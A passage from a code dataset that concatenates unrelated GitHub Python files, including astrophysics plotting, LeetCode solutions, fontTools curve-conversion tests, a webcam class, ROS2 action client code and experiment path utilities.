np.zeros(int(As.max()) + 1)\n for i in range(Ynrm.shape[0]): # changed xrange to range\n Ynrm[i] = Ys[As == i].sum()\n return Anrm, Ynrm\n\n @staticmethod\n def normalize_yields_to_sum(a_arr, ye_final):\n ''' Normalizes to a sum of all A '''\n norm = ye_final.sum()\n ye_final /= norm\n return a_arr, ye_final\n\n def normalize_yields_to_a(self, element_a, a_arr, ye_final):\n\n a_sol, ye_sol = self.solar()\n\n if element_a not in a_sol: raise ValueError('Element: a:{} not in solar A'.format(element_a, a_sol))\n if element_a not in a_arr: raise ValueError('Element: a:{} not in a_arr'.format(element_a, a_arr))\n\n delta = np.float(ye_sol[np.where(a_sol == element_a)] / ye_final[np.where(a_arr == element_a)])\n\n # print(a_sol[np.where(a_sol == element_a)])\n # print(a_arr[np.where(a_sol == element_a)])\n # print('delta:{}'.format(delta))\n ye_final *= delta\n # print(a_sol)\n # print(ye_final)\n # exit(1)\n # print(a_arr)\n # print(ye_final)\n\n return a_arr, ye_final\n\n def load_from_outflow(self, normalization=None):\n\n a_arr, ye_final, z_arr = self.load_res() # ~8000 entries, 1D array, for Z and A\n a_arr, ye_final = self.sum_for_all_charge_z(a_arr, ye_final) # ~200 entries, 1D 1 arrays\n\n # normalization options\n if normalization == 'sum':\n return self.normalize_yields_to_sum(a_arr, ye_final)\n elif normalization == None:\n return a_arr, ye_final\n else:\n a_to_norm = int(normalization)\n if a_to_norm < a_arr.min():\n raise ValueError('Give normalization A:{} is < a_arr.min():{}'.format(a_to_norm, a_arr.min()))\n if a_to_norm > a_arr.max():\n raise ValueError('Give normalization A:{} is > a_arr.max():{}'.format(a_to_norm, a_arr.max()))\n return self.normalize_yields_to_a(a_to_norm, a_arr, ye_final)\n\n def solar(self):\n\n Asun, Ysun = np.loadtxt(Paths.skynet + Files.solar_r, unpack=True)\n Asun, Ysun = self.sum_for_all_charge_z(Asun, Ysun)\n Ysun /= np.sum(Ysun)\n\n return Asun, Ysun\n\nclass PLOT_NUCLEO:\n\n def __init__(self):\n\n # self.task_dic = {'sims': ['DD2_M13641364_M0_SR']#, 'DD2_M13641364_M0_SR'], # corr_vn1\n # 'criteria': ['geo']#, 'bern wind'], # /_b_w/corr_vn1_vn2\n # 'det': [0]#, 0], # /outflowed_0_b_w/corr_vn1_vn2\n # 'norm': ['195']#, 'sum'],\n # 'labels': ['']#, ''],\n # 'colors': ['blue']#, 'red'],\n # 'yscale': 'log',\n # }\n\n self.task_dic = {'sims': ['DD2_M13641364_M0_SR', 'SLy4_M13641364_M0_SR', 'LS220_M13641364_M0_SR', 'SFHo_M13641364_M0_SR'],#, 'DD2_M13641364_M0_SR'], # corr_vn1\n 'extension': ['_0', '_0', '_0', '_0'],#, 'bern wind'], # /_b_w/corr_vn1_vn2 # /outflowed_0_b_w/corr_vn1_vn2\n 'norm': ['195', '195', '195', '195'],#, 'sum'],\n 'labels': ['DD2', 'SLy4', \"LS220\", 'SFHo'],#, ''],\n 'colors': ['blue', 'green', 'orange', 'red'],#, 'red'],\n 'yscale': 'log',\n }\n self.fig_name = 'yields'\n self.plot_solar = True\n\n def plot_from_dic(self):\n\n n_rows = 1\n n_cols = 1\n\n fig = plt.figure(figsize=(6.5, 3.6)) # figsize=(4.5, 2.5 * 3.6) # (<->; v)\n\n axs = []\n for n in range(1, n_rows + 1):\n if n == 1:\n axs.append(fig.add_subplot(n_rows, n_cols, n))\n else:\n axs.append(fig.add_subplot(n_rows, n_cols, n, sharex=axs[n - 2])) # sharex=axs[n - 2]))\n\n for i_sim, sim in enumerate(self.task_dic['sims']):\n\n cl_nuc = SIM_NUCLEO(sim, self.task_dic['extension'][i_sim])\n\n if self.plot_solar:\n a_sol, y_sol = cl_nuc.solar()\n axs[0].plot(a_sol, y_sol, '.', color='black')\n\n a_arr, ye_final = cl_nuc.load_from_outflow(self.task_dic['norm'][i_sim])\n axs[0].step(a_arr, ye_final, label=self.task_dic['labels'][i_sim], 
color=self.task_dic['colors'][i_sim])\n\n        axs[0].legend(loc='best', numpoints=1)\n        if self.task_dic['yscale'] == 'log':\n            axs[0].set_yscale(\"log\")\n        axs[0].tick_params(labelsize=12)\n        axs[0].set_ylabel(\"Relative final abundances\", fontsize=12)\n\n\n        plt.ylim(ymin=1e-5, ymax=2e-1)\n        plt.xlim(xmin=50, xmax=210)\n        # plt.ylabel(\"Relative final abundances\")\n        plt.xlabel(\"A\", fontsize=12)\n        # plt.yscale(\"log\")\n        plt.tick_params(axis='both', which='both', labelleft=True, labelright=False, tick1On=True, tick2On=True,\n                        labelsize=12, direction='in') # labeltop\n        # plt.xticks(fontsize=12)\n        # plt.yticks(fontsize=12)\n\n        plt.minorticks_on()\n        plt.savefig('{}{}.png'.format(Paths.plots, self.fig_name), bbox_inches='tight') # , dpi=128\n        plt.close()\n\nif __name__ == '__main__':\n\n    ''' PLOT YIELDS '''\n    pl_cl = PLOT_NUCLEO()\n    pl_cl.plot_from_dic()\n    exit(1)","repo_name":"vsevolodnedora/bns_ppr_scripts","sub_path":"nucleo.py","file_name":"nucleo.py","file_ext":"py","file_size_in_byte":8548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19104507426","text":"######################################################\n\n# Solved on Tuesday, 15 - 02 - 2022.\n\n######################################################\n\n\n######################################################\n\n# Runtime: 124ms - 97.37%\n# Memory: 16.3MB - 98.38%\n\n######################################################\n\nclass Solution:\n    def singleNumber(self, nums: List[int]) -> int:\n        \"\"\"\n        We use XOR operation to do this problem using O(1) space and O(n)\n        time complexity.\n        Truth Table of XOR is\n        A B A^B\n        0 0 0\n        0 1 1\n        1 0 1\n        1 1 0\n        We can see that if A and B have the same bit we will get 0 as answer\n        So, let's consider example [4, 1, 2, 1, 2]\n        In binary they are [100, 001, 010, 001, 010]\n\n        What we do is find XOR of all numbers in array and store it in number\n        So,\n        number = 100 ^ 001 ^ 010 ^ 001 ^ 010\n        XOR is commutative. So A ^ B = B ^ A\n        So, we consider above number operation in different order so that we\n        can understand the logic\n        number = 001 ^ 001 ^ 010 ^ 010 ^ 100\n        XOR is associative. So A ^ (B ^ C) = (A ^ B) ^ C\n        number = (001 ^ 001) ^ (010 ^ 010) ^ 100\n        According to truth table above, if both A and B are same, we get 0. \n        So, if numA == numB, we will get 0 as XOR.\n        number = 000 ^ 000 ^ 100\n        000 ^ 000 = 000\n        number = 000 ^ 100\n        From truth table of XOR, number = 100 ==> 4\n\n        Therefore logic is to perform XOR of all numbers and return it\n        \"\"\"\n        number = 0\n        \n        for num in nums:\n            number = number ^ num\n        \n        return number","repo_name":"Shannu26/leetcode-solutions","sub_path":"131 - 140/P136_SingleNumber.py","file_name":"P136_SingleNumber.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"12752586211","text":"import sys\r\ninput = sys.stdin.readline\r\nn = int(input())\r\na = []\r\nfor _ in range(n):\r\n    a.append(list(map(int, input().split())))\r\na.sort(key=lambda x: (x[1], x[0]))\r\ncur = 0\r\nj = 1\r\ncnt = 1\r\nwhile cur < n and j < n:\r\n    sc,ec = a[cur]\r\n    sj,ej = a[j]\r\n    if ec <= sj:\r\n        cur = j\r\n        cnt += 1\r\n    j+= 1\r\nprint(cnt)","repo_name":"jfmam/coding-test","sub_path":"백준/Silver/1931. 
회의실 배정/회의실 배정.py","file_name":"회의실 배정.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"36359192313","text":"\"\"\"\nModule containing utility functions\n\nmanage_time - HH:MM:SS formatted string from\n\t\t\t given seconds int\nsave_to_csv - saves given data in a csv file\n\n\"\"\"\ndef manage_time(time):\n\t\"\"\" Shorten time frame to minutes or hours\n\n\t\tParameters\n\t\t----------\n\t\t\ttime : int\n\t\t\t\ttime in seconds\n\n\t\tReturns\n\t\t-------\n\t\t\tstring\n\t\t\t\ttime in HH:MM:SS format\n\t\"\"\"\n\n\tif time < 60:\n\t\treturn(\"{:02}:{:02}:{:02}\".format(0, 0, time))\n\n\telif time >= 60 and time < 3600:\n\t\tminutes = int(time/60)\n\t\tseconds = time - 60*minutes\n\t\treturn(\"{:02}:{:02}:{:02}\".format(0, minutes, seconds))\n\n\telif time >= 3600:\n\t\thours = int(time/3600)\n\t\tminutes = int( (time - hours*3600) / 60)\n\t\tseconds = int (time - hours*3600 - minutes*60)\n\t\treturn(\"{:02}:{:02}:{:02}\".format(hours, minutes, seconds))\n\t\t\t\n\ndef save_to_csv(data, filename):\n\t\"\"\" Save given data to a csv file\n\n\t\tParameters\n\t\t----------\n\t\t\tdata : list\n\t\t\t\tdata to be saved and split by commas\n\t\t\tfilename : str\n\t\t\t\tfilename of the file to save the data to\n\n\t\tReturns\n\t\t-------\n\t\t\tfile : file\n\t\t\t\tsaves data to the output csv file\n\t\t\"\"\"\n\t# if given filename doesn't end with .csv:\n\tif filename[-4:] != '.csv':\n\t\tfilename = \"%s.csv\" % (filename)\n\n\twith open(filename, 'w') as file:\n\t\tfor line in data:\n\t\t\tfile.write(\"%d,%d,%s\\n\" % (line[0], line[1], line[2]))","repo_name":"ashanowski/symulacja_komputerowa","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16480267167","text":"#Task2\ndef rotateLeft(lst,k):\n    \n    for k in range(k):\n        temp = lst[0]\n        for elm in range(len(lst)-1):\n            lst[elm] = lst[elm+1]\n            lst[elm+1] = temp\n    return lst\n\nprint(rotateLeft([10,20,30,40,50,60],11))","repo_name":"ikramulkayes/Python_Season_4","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74600806513","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n        cur = head\n        while cur: # while cur is not null (after end of list)\n            while cur.next and cur.next.val == cur.val: # while cur.next is not null and the next value is the same\n                cur.next = cur.next.next # skip the next value (deletes node)\n            cur = cur.next # move to next node\n        return head\n\n","repo_name":"ericajstevenson/leetcode","sub_path":"86.py","file_name":"86.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35868520013","text":"import sys\n\nsys.path[0] = '../..'\nimport config\nfrom QuantumCapital import constants\nfrom QuantumCapital.DBManager import DBManager\n\n\nclass LastBarRemover:\n    def __init__(self):\n        self.dbm = DBManager(config.DB_USERNAME, config.DB_PASS, 'BARS_DAY')\n        self.dict_tbl = constants.DAY_BAR_DICTIONARY_TABLE\n        self.presence_tbl = 
constants.DAY_BAR_RUSSEL_PRESENCE_TABLE\n\n def remove_last_bars(self, year):\n tickers = self.get_year_tickers(year)\n for ticker in tickers:\n ticker_info = self.dbm.select_df(f'select table_name, last_date, bars_count \\\n from {self.dict_tbl} where ticker=\\'{ticker}\\'')\n table_name = ticker_info.iloc[0].table_name\n last_date = ticker_info.iloc[0].last_date\n bars_count = ticker_info.iloc[0].bars_count\n\n self.dbm.delete_table_row(table_name, {'dt': \"\\'\" + str(last_date) + \"\\'\"})\n\n last_date_new = self.dbm.select_df(f'select dt from {table_name} order by dt desc')\n last_date_new = last_date_new.iloc[0]['dt']\n print(last_date, last_date_new)\n\n # (constants.DAY_BAR_DICTIONARY_TABLE,\n # {'last_date': f\"\\'{last_date}\\'\",\n # 'bars_count': f'bars_count + {new_bars_count}',\n # 'years': \"\\'{\" + ', '.join([str(y) for y in years]) + \"}\\'\",\n # 'memory': size},\n # {'ticker': f\"\\'{ticker.upper()}\\'\"})\n self.dbm.update_table_row(self.dict_tbl, {'last_date': f\"\\'{last_date_new}\\'\", 'bars_count': f'bars_count - 1'},\n {'ticker': f\"\\'{ticker.upper()}\\'\"})\n\n print('----------------------')\n self.dbm.commit()\n\n def get_year_tickers(self, year):\n df = self.dbm.select_df(f'select * from {self.presence_tbl} where yr={year}')\n assert df.shape[0] == 1\n return df.iloc[0].present\n\n\nif __name__ == '__main__':\n remover = LastBarRemover()\n remover.remove_last_bars(2020)\n","repo_name":"BatyaGG/QCapital","sub_path":"DataParsers/IB/OneDay/LastBarRemover.py","file_name":"LastBarRemover.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27263185876","text":"import collections\nimport math\nimport unittest\nimport os\nimport json\n\nfrom fontTools.cu2qu import curve_to_quadratic, curves_to_quadratic\n\n\nDATADIR = os.path.join(os.path.dirname(__file__), \"data\")\n\nMAX_ERR = 5\n\n\nclass CurveToQuadraticTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n \"\"\"Do the curve conversion ahead of time, and run tests on results.\"\"\"\n with open(os.path.join(DATADIR, \"curves.json\"), \"r\") as fp:\n curves = json.load(fp)\n\n cls.single_splines = [curve_to_quadratic(c, MAX_ERR) for c in curves]\n cls.single_errors = [\n cls.curve_spline_dist(c, s) for c, s in zip(curves, cls.single_splines)\n ]\n\n curve_groups = [curves[i : i + 3] for i in range(0, 300, 3)]\n cls.compat_splines = [\n curves_to_quadratic(c, [MAX_ERR] * 3) for c in curve_groups\n ]\n cls.compat_errors = [\n [cls.curve_spline_dist(c, s) for c, s in zip(curve_group, splines)]\n for curve_group, splines in zip(curve_groups, cls.compat_splines)\n ]\n\n cls.results = []\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Print stats from conversion, as determined during tests.\"\"\"\n\n for tag, results in cls.results:\n print(\n \"\\n%s\\n%s\"\n % (\n tag,\n \"\\n\".join(\n \"%s: %s (%d)\" % (k, \"#\" * (v // 10 + 1), v)\n for k, v in sorted(results.items())\n ),\n )\n )\n\n def test_results_unchanged(self):\n \"\"\"Tests that the results of conversion haven't changed since the time\n of this test's writing. 
Useful as a quick check whenever one modifies\n the conversion algorithm.\n \"\"\"\n\n expected = {2: 6, 3: 26, 4: 82, 5: 232, 6: 360, 7: 266, 8: 28}\n\n results = collections.defaultdict(int)\n for spline in self.single_splines:\n n = len(spline) - 2\n results[n] += 1\n self.assertEqual(results, expected)\n self.results.append((\"single spline lengths\", results))\n\n def test_results_unchanged_multiple(self):\n \"\"\"Test that conversion results are unchanged for multiple curves.\"\"\"\n\n expected = {5: 11, 6: 35, 7: 49, 8: 5}\n\n results = collections.defaultdict(int)\n for splines in self.compat_splines:\n n = len(splines[0]) - 2\n for spline in splines[1:]:\n self.assertEqual(\n len(spline) - 2, n, \"Got incompatible conversion results\"\n )\n results[n] += 1\n self.assertEqual(results, expected)\n self.results.append((\"compatible spline lengths\", results))\n\n def test_does_not_exceed_tolerance(self):\n \"\"\"Test that conversion results do not exceed given error tolerance.\"\"\"\n\n results = collections.defaultdict(int)\n for error in self.single_errors:\n results[round(error, 1)] += 1\n self.assertLessEqual(error, MAX_ERR)\n self.results.append((\"single errors\", results))\n\n def test_does_not_exceed_tolerance_multiple(self):\n \"\"\"Test that error tolerance isn't exceeded for multiple curves.\"\"\"\n\n results = collections.defaultdict(int)\n for errors in self.compat_errors:\n for error in errors:\n results[round(error, 1)] += 1\n self.assertLessEqual(error, MAX_ERR)\n self.results.append((\"compatible errors\", results))\n\n @classmethod\n def curve_spline_dist(cls, bezier, spline, total_steps=20):\n \"\"\"Max distance between a bezier and quadratic spline at sampled points.\"\"\"\n\n error = 0\n n = len(spline) - 2\n steps = total_steps // n\n for i in range(0, n - 1):\n p1 = spline[0] if i == 0 else p3\n p2 = spline[i + 1]\n if i < n - 1:\n p3 = cls.lerp(spline[i + 1], spline[i + 2], 0.5)\n else:\n p3 = spline[n + 2]\n segment = p1, p2, p3\n for j in range(steps):\n error = max(\n error,\n cls.dist(\n cls.cubic_bezier_at(bezier, (j / steps + i) / n),\n cls.quadratic_bezier_at(segment, j / steps),\n ),\n )\n return error\n\n @classmethod\n def lerp(cls, p1, p2, t):\n (x1, y1), (x2, y2) = p1, p2\n return x1 + (x2 - x1) * t, y1 + (y2 - y1) * t\n\n @classmethod\n def dist(cls, p1, p2):\n (x1, y1), (x2, y2) = p1, p2\n return math.hypot(x1 - x2, y1 - y2)\n\n @classmethod\n def quadratic_bezier_at(cls, b, t):\n (x1, y1), (x2, y2), (x3, y3) = b\n _t = 1 - t\n t2 = t * t\n _t2 = _t * _t\n _2_t_t = 2 * t * _t\n return (_t2 * x1 + _2_t_t * x2 + t2 * x3, _t2 * y1 + _2_t_t * y2 + t2 * y3)\n\n @classmethod\n def cubic_bezier_at(cls, b, t):\n (x1, y1), (x2, y2), (x3, y3), (x4, y4) = b\n _t = 1 - t\n t2 = t * t\n _t2 = _t * _t\n t3 = t * t2\n _t3 = _t * _t2\n _3_t2_t = 3 * t2 * _t\n _3_t_t2 = 3 * t * _t2\n return (\n _t3 * x1 + _3_t_t2 * x2 + _3_t2_t * x3 + t3 * x4,\n _t3 * y1 + _3_t_t2 * y2 + _3_t2_t * y3 + t3 * y4,\n )\n\n\nclass AllQuadraticFalseTest(unittest.TestCase):\n def test_cubic(self):\n cubic = [(0, 0), (0, 1), (2, 1), (2, 0)]\n result = curve_to_quadratic(cubic, 0.1, all_quadratic=False)\n assert result == cubic\n\n def test_quadratic(self):\n cubic = [(0, 0), (2, 2), (4, 2), (6, 0)]\n result = curve_to_quadratic(cubic, 0.1, all_quadratic=False)\n quadratic = [(0, 0), (3, 3), (6, 0)]\n assert result == quadratic\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","repo_name":"fonttools/fonttools","sub_path":"Tests/cu2qu/cu2qu_test.py","file_name":"cu2qu_test.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":3868,"dataset":"github-code","pt":"39"} +{"seq_id":"5882643476","text":"\"\"\"Webcam camera.\"\"\"\nimport logging\n\nimport cv2\n\nfrom ..utils import memory, settings\n\n\nclass Webcam:\n \"\"\"Webcam class.\"\"\"\n\n def __init__(\n self,\n memory=memory.mem,\n index=0,\n shape=tuple(settings.settings.IMAGE_SHAPE),\n ):\n \"\"\"Camera init.\n\n Args:\n index (int, optional): index of the camera. Defaults to 0.\n shape (tuple, optional): shape of the output image. Defaults to (160, 120, 3).\n \"\"\"\n self.memory = memory\n\n self.cap = cv2.VideoCapture(index)\n ret, img = self.cap.read()\n assert ret, \"Couldn't read from camera\"\n\n self.shape = shape\n assert len(self.shape) == 3, \"Shape should have 3 dimensions\"\n\n self.h, self.w, self.c = self.shape\n assert self.c in [\n 1,\n 3,\n ], \"Image last dimension should be either 3 (RGB) or 1 (GREY)\"\n logging.info(\"Instantiated Webcam camera.\")\n\n def update(self):\n \"\"\"Read image from the camera.\n\n Raises:\n ValueError: if couldn't grab the image, raise a valueError.\n \"\"\"\n ret, img = self.cap.read()\n if ret:\n img = cv2.resize(img, (self.w, self.h))\n if self.c == 3:\n self.memory[\"image\"] = img\n else:\n self.memory[\"image\"] = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n else:\n raise ValueError(\"Image read failed\")\n","repo_name":"Autonomobile/AutoPylot","sub_path":"autopylot/cameras/webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"39"} +{"seq_id":"3142243795","text":"#!/usr/bin/env python\n\n#======================================================================\n# Set-up \n\n# config.py holds credentials that should not be shared and other setup values\nimport config\nfrom datetime import datetime\nimport logging\n\n\n###################### Set up Logging\nlogfile = config.LOGFILE\n\n# get Date and time\ndt_object = datetime.now()\n# Create time format for Logging\nmodified = dt_object.strftime('_%Y-%m-%d_%H_%M')\nlogfile = logfile + modified + \".txt\"\n\n# configure logging\nFORMAT = '%(asctime)-20s %(levelname)-8s %(message)s'\nlogging.basicConfig(filename=logfile, level=logging.INFO, format=FORMAT, datefmt='%Y-%m-%d %H:%M:%S')\n\n###################### End of Logging Setup\n\n\ndef setup(): # Shutdown GPIO and Cleanup modules\n\n print ('\\n\\nSetting Up ...\\n')\n\n \n \n# End of set-up Procedures \n#======================================================================\n\n#======================================================================\n# Clean-up \n \ndef destroy(): # Shutdown GPIO and Cleanup modules\n\n print ('\\n\\nCleaning Up ...\\n')\n\n #GPIO.cleanup() # Release GPIO resource\n \n# End of Clean-up Procedures \n#======================================================================\n\n#====================================================================== \n# Main Control Procedure\n \ndef maincontrol(): # Main Control Loop\n\n print ('\\n\\nMain Loop ...\\n')\n\n# Main functionality goes here\n\n# End of Main Control Procedure \n#====================================================================== \n\n#====================================================================== \n# __Main__ Startup Loop \n \nif __name__ == '__main__': # If this is loaded as 
the main Program will start from here\n    \n    # Get and parse Arguments\n    \n    setup()                      # Setup\n\n    print ('\\nGo ...\\n\\n')\n\t\n    try:\n        maincontrol()     # Call main loop\n        destroy()         # Shutdown\n        print ('\\n\\n................... Exit .......................\\n\\n')\n        exit(0)           # Exit Cleanly\n    except KeyboardInterrupt:\n        destroy()\n        print ('\\n\\n................... Exit .......................\\n\\n')\n        exit(0)           # Exit Cleanly\n    \n# End of __Main__ Startup Loop \n#======================================================================\n\n\n\n","repo_name":"CosmaP/Misc-Junk","sub_path":"Python_Template.py","file_name":"Python_Template.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31695749042","text":"import os\nimport time\n\nfrom shr_msgs.action import FindPersonRequest, GatherInformationRequest\nfrom rclpy.action import ActionServer, ActionClient\nfrom rclpy.action import CancelResponse\nfrom rclpy.node import Node\nimport rclpy\n\nfrom std_msgs.msg import Bool\nfrom shr_msgs.msg import WorldState\n\nimport datetime\nimport time\nclass MyActionClient(Node):\n    def __init__(self):\n        super().__init__(\"my_action_client\")\n        self.goal_handle = None\n        self._action_client = ActionClient(self, GatherInformationRequest, 'gather_information')\n\n    def send_goal(self):\n        #Send an action goal\n        goal_msg = GatherInformationRequest.Goal()\n        goal_msg.states = ['patient_location']\n        self._action_client.wait_for_server()\n        future = self._action_client.send_goal_async(goal_msg)\n        future.add_done_callback(self.goal_response_callback)\n\n    def goal_response_callback(self, future):\n        self.goal_handle = future.result()\n        if not self.goal_handle.accepted:\n            self.get_logger().info('Goal rejected :(')\n            return\n\n        self.get_logger().info('Goal accepted :)')\n\n        # self._get_result_future = self.goal_handle.get_result_async()\n\n    def cancel_goal(self):\n        self.get_logger().info('Canceling goal')\n        future = self.goal_handle.cancel_goal_async()\n        future.add_done_callback(self.goal_canceled_callback)\n\n    def goal_canceled_callback(self, future):\n        cancel_response = future.result()\n        if len(cancel_response.goals_canceling) > 0:\n            self.get_logger().info('Cancelling of goal complete')\n        else:\n            self.get_logger().warning('Goal failed to cancel')\n\n\n\ndef main(args=None):\n    rclpy.init(args=args)\n\n    world_state_node = MyActionClient()\n    world_state_node.send_goal()\n    start = time.time()\n    while world_state_node.goal_handle is None:\n        rclpy.spin_once(world_state_node)\n\n    world_state_node.cancel_goal()\n\n    rclpy.spin(world_state_node)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"AssistiveRoboticsUNH/smart-home","sub_path":"shr_world_state/shr_world_state/client_node_test.py","file_name":"client_node_test.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"5014217328","text":"\"\"\"\nGiven an image of size n*m, location of a pixel in the screen i.e. (sr, sc) and color newColor, \nyour task is to replace color of the given pixel and all adjacent(excluding diagonally adjacent) same colored pixels with the given color newColor.\n \n\nExample 1:\n\nInput: image = {{1,1,1},{1,1,0},{1,0,1}},\nsr = 1, sc = 1, newColor = 2.\nOutput: {{2,2,2},{2,2,0},{2,0,1}}\nExplanation: From the center of the image \n(with position (sr, sc) = (1, 1)), all \npixels connected by a path of the same color\nas the starting pixel are colored with the new \ncolor. Note the bottom corner is not colored 2, \nbecause it is not 4-directionally connected to \nthe starting pixel.\n\nIt is an extension to rotting oranges problem which we did in bfs and we have done this in dfs to increase our knowledge\n\"\"\"\ndef floodFill(self, image, sr, sc, new):\n    #Code here\n    prev = image[sr][sc]\n    n, m = len(image), len(image[0]) # grid dimensions\n    def solve(image,sr,sc,new,prev):\n        if sr < 0 or sc < 0 or sr >= n or sc >= m or image[sr][sc] != prev or image[sr][sc] == new:\n            return\n        image[sr][sc] = new\n        \n        solve(image,sr+1,sc,new,prev)\n        solve(image,sr-1,sc,new,prev)\n        solve(image,sr,sc+1,new,prev)\n        solve(image,sr,sc-1,new,prev)\n    solve(image,sr,sc,new,prev)\n    return image\n\"\"\"\nTC = O(n*m)\nSC = O(n*m)\n\"\"\"","repo_name":"Yug-gurnani/DSA-Questions","sub_path":"SDE sheet/22. Mixed Questions/6. Flood fill algorithm.py","file_name":"6. Flood fill algorithm.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"39"} +{"seq_id":"75018451634","text":"import os\nimport shutil\nimport sys\nfrom datetime import datetime\nfrom importlib import import_module\nfrom pathlib import Path\n\nfrom .exceptions import ExistingExperimentFound\n\n\ndef get_save_dir(config_path):\n    \"\"\"Determine the path where the experimental results will be saved.\"\"\"\n    parts = str(config_path).split('/')\n    i = parts.index('experiments')\n    root_dir = os.path.expandvars('$SM_MODEL_DIR')\n    save_dir = os.path.join(root_dir, *parts[i+1:-1])\n    if not os.path.exists(save_dir):\n        os.makedirs(save_dir, exist_ok=True)\n    return save_dir\n\n\ndef get_experiment_id(checkpoint_id, trial, save_dir, resume):\n    chkpt_dir = Path(save_dir) / 'checkpoints'\n    if resume and not checkpoint_id and chkpt_dir.exists():\n        paths = chkpt_dir.glob('*/last.ckpt')\n        checkpoint_id = next(paths).parent.name\n    now = datetime.now().strftime('%Y%m%d-%H%M%S-%f')\n    return checkpoint_id or f'trial-{trial}-{now}'\n\n\ndef import_string(dotted_path):\n    \"\"\"Import a dotted module path.\n\n    And return the attribute/class designated by the\n    last name in the path. 
Raise ImportError if the import failed.\n\n Adatped from https://stackoverflow.com/a/34963527/3790116.\n \"\"\"\n try:\n module_path, class_name = dotted_path.rsplit('.', 1)\n except ValueError as e:\n msg = \"%s doesn't look like a module path\" % dotted_path\n raise ImportError.with_traceback(ImportError(msg), sys.exc_info()[2])\n\n module = import_module(module_path)\n\n try:\n return getattr(module, class_name)\n except AttributeError:\n msg = 'Module \"%s\" does not define a \"%s\" attribute/class' % (\n module_path, class_name)\n raise ImportError.with_traceback(ImportError(msg), sys.exc_info()[2])\n\n\ndef delete_old_results(results_dir, force, trial, resume):\n \"\"\"Delete existing checkpoints and wandb logs if --force is enabled.\"\"\"\n wandb_dir = Path(results_dir) / 'wandb'\n wandb_matches = list(wandb_dir.glob(f'*-trial-{trial}-*'))\n\n chkpt_dir = Path(results_dir) / 'checkpoints'\n chkpt_matches = list(chkpt_dir.glob(f'trial-{trial}-*'))\n\n if force and wandb_matches:\n [shutil.rmtree(p) for p in wandb_matches]\n\n if force and chkpt_matches:\n [shutil.rmtree(p) for p in chkpt_matches]\n\n if not force and not resume and wandb_matches:\n raise ExistingExperimentFound(f'Directory already exists: {wandb_dir}')\n\n if not force and not resume and chkpt_matches:\n raise ExistingExperimentFound(f'Directory already exists: {chkpt_dir}')\n","repo_name":"alasdairtran/fourierflow","sub_path":"fourierflow/utils/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"39"} +{"seq_id":"18469043344","text":"import platform\nfrom betse.exceptions import BetseOSException\nfrom betse.util.io.log.logs import log_warning\nfrom betse.util.type.decorator.decmemo import func_cached\nfrom ctypes import CDLL, byref, c_int\n\n# ....................{ CONSTANTS }....................\n_SECURITY_FRAMEWORK_DYLIB_FILENAME = (\n '/System/Library/Frameworks/Security.framework/Security')\n'''\nAbsolute path of the system-wide ``\"Security.framework\"`` Macho-O shared library\nproviding the macOS-specific security context for the current process.\n\nThis library is dynamically loadable into the address space of the current\nprocess with the :class:`ctypes.CDLL` class. 
Since all Macho-O shared libraries\nnecessarily have the filetype ``\".dylib\"``, this filetype can be safely omitted.\n'''\n\n\n_SECURITY_SESSION_ID_CURRENT = -1\n'''\nMagic integer defined as `callerSecuritySession` by the macOS-specific\n`/System/Library/Frameworks/Security.Framework/Headers/AuthSession.h` C header\nsuitable for passing to C functions accepting parameters of C type\n`SecuritySessionId` (e.g., `SessionGetInfo()`).\n\nWhen passed, this integer signifies the **current security session** (i.e., the\nthe security session to which the current process belongs).\n\nSee Also\n----------\nhttps://opensource.apple.com/source/libsecurity_authorization/libsecurity_authorization-32564/lib/AuthSession.h\n C header defining this magic integer.\n'''\n\n\n_SECURITY_SESSION_HAS_GRAPHIC_ACCESS = 0x0010\n'''\nBit flag defined as `sessionHasGraphicAccess` by the macOS-specific\n`/System/Library/Frameworks/Security.Framework/Headers/AuthSession.h` C header\nmasking the attributes bit field returned by the `SessionGetInfo()` C function\nalso declared by that header.\n\nWhen enabled, this bit signifies the current process to have access to the Aqua\ndisplay server and hence be headfull (rather than headless).\n\nSee Also\n----------\nhttps://opensource.apple.com/source/libsecurity_authorization/libsecurity_authorization-32564/lib/AuthSession.h\n C header defining this bit flag.\n'''\n\n# ....................{ EXCEPTIONS }....................\ndef die_unless_macos() -> None:\n '''\n Raise an exception unless the current platform is Apple 